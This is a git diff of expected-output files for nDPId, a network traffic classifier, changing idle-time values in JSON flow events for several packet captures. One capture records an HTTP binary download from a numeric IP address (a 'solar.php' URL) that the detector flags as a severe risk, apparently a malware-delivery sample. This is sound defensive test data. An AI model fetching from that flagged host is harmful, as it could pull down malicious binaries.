+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} +01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"AAC8X0j6eOfR4AJeCABFAAICcEdAAIAGAACNUQAKjVEAK81yrxIurdDtV0tJbVAY+DYczAAAcADCAQAEAhAAAAAAVwG6AAAAAAAAAAAAAAAAAAoAAgChAAQAAi2WALEArgFJUwoCIAIkAR4APgBKAFYAYgBuAHoAhgCSAJ4AqgC2AMIAzgDaAOYA8gD+AAoBFgEiAS4BOgFGAVIBXgFqAXYBggGOAZoBTAIgciQALBwHAAEATAIgciQA0BsGAAEATAIgciQAsBQHAAEATAIgciQA3PMHAAEATAIgciQAnDYFAAEATAIgciQAvAcHAAEATAIgciQAkNEFAAEATAIgciQAAH8HAAEATAIgciQATCMGAAEATAIgciQAOEkGAAEATAIgciQALIcEAAEATAIgciQAALQFAAEATAIgciQAqHwFAAEATAIgciQATJYHAAEATAIgciQAaBgHAAEATAIgciQA3PsGAAEATAIgciQATLwGAAEATAIgciQAGB0IAAEATAIgciQAcFMHAAEATAIgciQAvIMFAAEATAIgciQAvBkGAAEATAIgciQAOJQFAAEATAIgciQATLEFAAEATAIgciQA9HoGAAEATAIgciQApPIGAAEATAIgciQAFIEEAAEATAIgciQA2PAEAAEATAIgciQA+FMGAAEATAIgciQA2PUGAAEATAIgciQApF8HAAEA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180397,"pkt":"AAC8X0lReOfR4AJeCABFAADqcEpAAIAGAACNUQAKjVEAF\/T9rxIm2H0TxmFi41AY9W4boAAAcACqAAABAhAAAAAAo6iTAAAAAAAAAAAAAAAAAAoAAgChAAQAAQOLALEAlgBx7AoCIAIkAQQACgAoAEYAagBODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMQEAAf9ODJEWTE1TX0RJU0FCTEVfMkRTQ0FOTkVSMgEAAf9OD5EbTE1TX0RJU0FCTEVfQkFSQ09ERV9TQ0FOTkVSAAEAAP5OD5EbTE1TX1NFVFBPSU5UQ0hBTkdFX1JFQ0VJVkVEAAEAAP4="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7560000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1352718180400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1352718180400,"pkt":"eOfR4AJeAAC8X0lRCABFAAB0TSZAAEAG0pqNUQAXjVEACq8S9P3GYWLjJth91VAYEADGbgAAcAA0AAABAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAtccAgLEAIABx7IoAAAAEAAoADgASABYAzgAAAM4AAADOAAAAzgAAAA=="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1352718180599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1352718180599,"pkt":"AAC8X0lReOfR4AJeCABFAAAocJ5AAIAGAACNUQAKjVEAF\/T9rxIm2H3VxmFjL1AQ+vAa3gAA"} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1352718180263,"flow_last_seen":1352718180959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1204,"flow_tot_l4_payload_len":3766,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1352718180397,"flow_last_seen":1352718181046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2398,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1352718180265,"flow_last_seen":1352718181047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":107,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1352718180390,"flow_last_seen":1352718181050,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":2598,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1352718181050,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":11876,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1352718181050} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 diff --git a/test/results/exe_download.pcap.out b/test/results/exe_download.pcap.out index 66ddf4e49..09929249a 100644 --- a/test/results/exe_download.pcap.out +++ b/test/results/exe_download.pcap.out @@ -1,12 +1,12 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434051004} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} -00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434051004,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434051004,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434051004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434051004,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0AI9AAIAGAKkKCRllkFtFw8ANAFC+hvgeAAAAAIACIADegAAAAgQFtAEDAwgBAQQC"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434051324,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsBbAAAIAGO5CQW0XDCgkZZQBQwA0+79i4vob4H2AS+vAU7QAAAgQFtA=="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434051324,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoALJAAIAGAJIKCRllkFtFw8ANAFC+hvgfPu\/YuVAQ+vAsqgAA"} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434051004,"flow_last_seen":1569434051324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569434051324,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":0,"content_type":"","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +01067{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434051004,"flow_last_seen":1569434051623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434051623,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"144.91.69.195","url":"144.91.69.195\/solar.php","code":200,"content_type":"application\/octet-stream","user_agent":"pwtyyEKzNtGatwnJjmCcBLbOveCVpc"}} +00933{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":703,"flow_first_seen":1569434051004,"flow_last_seen":1569434056186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":679485,"flow_avg_l4_payload_len":966,"midstream":0,"thread_ts_msec":1569434056186,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"144.91.69.195","src_port":49165,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":703,"source":"exe_download.pcap","alias":"nDPId-test","packets-captured":703,"packets-processed":703,"total-skipped-flows":0,"total-l4-data-len":679485,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434056186} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 703/703 diff --git a/test/results/exe_download_as_png.pcap.out b/test/results/exe_download_as_png.pcap.out index 3633d7f55..33913a43f 100644 --- a/test/results/exe_download_as_png.pcap.out +++ b/test/results/exe_download_as_png.pcap.out @@ -1,12 +1,12 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"exe_download_as_png.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569434903040} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 